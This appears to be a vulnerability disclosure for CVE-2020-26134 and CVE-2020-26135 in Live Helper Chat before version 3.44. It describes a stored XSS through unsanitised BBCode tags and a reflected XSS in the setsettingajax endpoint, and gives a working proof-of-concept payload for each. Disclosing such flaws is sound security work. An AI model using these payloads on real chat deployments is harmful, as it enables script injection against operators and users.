CVE-2020-26134
description
Live Helper Chat before 3.44v allows stored XSS in chat messages with an operator via BBCode.
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] LiveHelperChat
[Affected Product Code Base] https://github.com/LiveHelperChat/livehelperchat - versions < 3.44
[Affected Component] stored xss in chat messages with operator
vulnerability
livehelperchat allows bbcode usage, but the parser fails to sanitize the message when combined with url, (url parser fail) to insert them into webpage correctly. different bbcodes can be abused
'/\[list\=(.*?)\](.*?)\[\/list\]/ms',
'/\[fs(.*?)\](.*?)\[\/fs(.*?)\]/ms',
'/\[color\=(.*?)\](.*?)\[\/color\]/ms'
example payload
[list="><img src="http://onmouseover=alert(document.domain)//"><ol f="][/list]
CVE-2020-26135
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] LiveHelperChat
[Affected Product Code Base] https://github.com/LiveHelperChat/livehelperchat - versions < 3.44
[Affected Component] reflected xss in setsettingajax
example payload
http://HOST/LCH_PATH/index.php/user/setsettingajax/%3Csvg%20onload=alert(1)%3E